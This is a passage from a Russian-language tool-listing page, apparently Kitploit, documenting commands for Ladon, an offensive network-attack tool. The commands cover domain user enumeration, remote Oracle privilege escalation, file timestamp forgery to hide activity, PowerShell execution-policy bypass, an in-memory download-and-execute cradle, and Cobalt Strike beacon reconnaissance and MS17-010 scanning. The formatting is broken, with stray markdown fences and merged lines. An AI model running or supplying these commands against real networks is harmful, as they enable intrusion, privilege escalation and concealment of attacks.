256 DomainLog DomainUserIP удаленный запрос IP доменного пользователя```Bash
root@kitploit:~
   Ladon DomainLog -d 7
   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 Проверка, является ли пользователь администратором Lotus```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 HTA сервер Однокнопочный запуск Доступ к DOC также может выполнять HTA```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer определение версии Confluence```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD можно использовать для поиска мест входа пользователей Active Directory и перечисления пользователей домена```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 Инструмент удаленного повышения привилегий для Oracle Database, официальный драйвер >=.net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Инструмент удаленного повышения привилегий для базы данных Oracle 3 способа повышения привилегий одним кликом```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS динамическая компиляция файлов кода C#```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
Изменить время файла / Указать время файла

Usage: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### Изменение времени файла Копирование времени файла```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

PowerShell версия Ladon.ps1

0x001 Cmd интерактивное выполнение```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 локальное неинтерактивное выполнение```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 удалённая загрузка и выполнение в памяти```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 Bypass обход выполнения политики по умолчанию PowerShell```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 Пользовательское сканирование портов```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon обнаружение активных хостов```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

CS Beacon пользовательское сканирование портов```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
CS Beacon MS17010 обнаружение уязвимости```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

Пример

http://k8gege.org/Ladon/example-en.html

Последняя версия

Последняя версия в малом кольце-печати: http://k8gege.org/Ladon/update.txt

Звезды с течением времени

Звезды с течением времени

Скачать инструмент